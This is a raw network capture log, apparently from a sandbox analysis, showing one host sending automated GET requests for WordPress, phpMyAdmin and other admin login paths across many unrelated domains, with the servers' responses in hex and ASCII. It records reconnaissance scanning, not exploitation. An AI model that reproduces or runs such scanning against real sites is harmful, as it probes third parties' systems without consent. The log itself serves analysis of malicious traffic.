Nov 30, 2023 11:22:39.964901924 CET	927	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QYatw3rsOglfJWMQnSF3CU1XH5Lm2x8n+awW5DPf3bCA/NGZjeYgpgKS2PWdKWhSThFPTUjsmyyOyNzYiMZ+Nw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.076154947 CET	371	OUT	GET /wp-admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://1.tv/wp-login.php
Nov 30, 2023 11:22:41.176093102 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_X27dujZtkyg80dvwN8eFwFrIlCp+2LlwHyDfLvForZR7VPaqetR7XsvvSzbMsx8RXUMRXjm4BK9A+MQb+JumPg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.380886078 CET	924	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_X27dujZtkyg80dvwN8eFwFrIlCp+2LlwHyDfLvForZR7VPaqetR7XsvvSzbMsx8RXUMRXjm4BK9A+MQb+JumPg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	58872	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.735369921 CET	227	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.850178003 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=b2e1b3e8-56a6-4e66-b556-779be132fb44; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:12 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	59060	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.907285929 CET	229	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.094630957 CET	347	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 63 61 6e 6e 2e 63 72 2e 63 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='0; url=http://gcann.cr.co.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	59585	67.21.93.254	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.070739031 CET	220	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: il.cm Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.223063946 CET	358	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	59443	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.087272882 CET	223	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.275366068 CET	341	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 34 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 62 79 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>44 <meta http-equiv='refresh' content='0; url=http://gbya.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	59576	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.098683119 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.277698994 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:40 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:40.280637980 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.465507984 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:40 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:40 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=jnq3lk7aaq6oj2kmguevpcj760; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:40.465527058 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:40.465544939 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:40.465560913 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	58889	157.7.44.171	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.113697052 CET	224	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.378603935 CET	432	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 209 Connection: keep-alive Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	59852	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.146228075 CET	220	OUT	GET /admin.php HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.250308037 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-137.ec2.internal X-Request-Id: 243215cb-10f2-42fb-b850-8db3c87e399c Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	59808	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.196784973 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gmo.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.387180090 CET	339	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6d 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>42 <meta http-equiv='refresh' content='0; url=http://gmo.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	59854	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.221721888 CET	219	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.401226044 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:40 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	59857	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.223520041 CET	224	OUT	GET /wp-login.php HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	59856	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.223839998 CET	230	OUT	GET /wp-login.php HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	59855	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.223859072 CET	221	OUT	GET /admin.php HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.415229082 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:40 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	60144	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:40.257817030 CET	225	OUT	GET /wp-login.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:40.391129971 CET	544	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:40 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/wp-login.php Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD 